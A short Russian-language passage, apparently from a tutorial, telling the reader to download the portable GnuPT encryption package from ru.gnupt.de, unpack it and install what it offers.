Что же, не густо. Давайте скачаем портативную версию GnuPT с сайта ru.gnupt.de - все, что нам понадобиться там есть. Распакуем и установим, что предложит нам GnuPT.